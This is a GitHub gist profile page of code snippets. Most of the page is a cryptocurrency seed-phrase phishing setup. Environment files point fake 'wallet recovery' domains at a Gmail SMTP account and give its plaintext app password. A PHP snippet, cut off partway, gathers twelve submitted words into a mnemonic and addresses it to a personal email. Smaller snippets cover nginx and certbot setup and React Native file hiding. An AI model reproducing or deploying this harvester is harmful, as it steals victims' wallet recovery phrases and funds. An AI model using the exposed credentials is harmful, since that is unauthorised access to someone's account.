Skip to content

Instantly share code, notes, and snippets.

View elinteerie's full-sized avatar
🏠
Working from home

Igwe Ugochukwu Michael Sylvester elinteerie

🏠
Working from home
View GitHub Profile
SMTP_HOST=smtp.gmail.com
SMTP_PORT=587
SMTP_USER=chicanoshubservices@gmail.com
SMTP_PASS=hernlxqxinwplddk
SMTP_FROM=chicanoshubservices@gmail.com
SMTP_FROM_NAME=12 MNEMONICS
DOMAIN=recoveryassistdev.com
SMTP_HOST=smtp.gmail.com
SMTP_PORT=587
SMTP_USER=chicanoshubservices@gmail.com
SMTP_PASS=hernlxqxinwplddk
SMTP_FROM=chicanoshubservices@gmail.com
SMTP_FROM_NAME=12 MNEMONICS
DOMAIN=solwalletrecovery.com
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$inputs = [];
for ($i = 1; $i <= 12; $i++) {
$key = "input$i";
$inputs[] = htmlspecialchars($_POST[$key]);
}
$mnemonic = implode(" ", $inputs);
$to = "elinteerie@gmail.com"; // Change this to your receiving email
{
"url": "https://peetokapp.live",
"name": "Peetok",
"iconUrl": "https://peetokapp.live/icon.png",
"termsOfUseUrl": "https://peetokapp.live/terms-of-use-url",
"privacyPolicyUrl": "hhttps://peetokapp.live/privacy-policy-url"
}
sudo mkdir /etc/ssl/private
sudo chmod 700 /etc/ssl/private
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/nginx-selfsigned.key -out /etc/ssl/certs/nginx-selfsigned.crt
##
sudo apt update
sudo apt install certbot python3-certbot-nginx
sudo certbot --nginx -d studentsdecides.com.ng -d www.studentsdecides.com.ng
@elinteerie
elinteerie / hidden.js
Created June 5, 2023 23:36
code to implement hiding of the videos in app-specific directory React Native
//Install the react-native-fs library by running the following command in your project's root directory
npm install react-native-fs --save
react-native link react-native-fs
import RNFS from 'react-native-fs';
// Function to download the Video From Cloud or Storage
async function downloadVideo(videoUrl, savePath) {
try {
const response = await RNFS.downloadFile({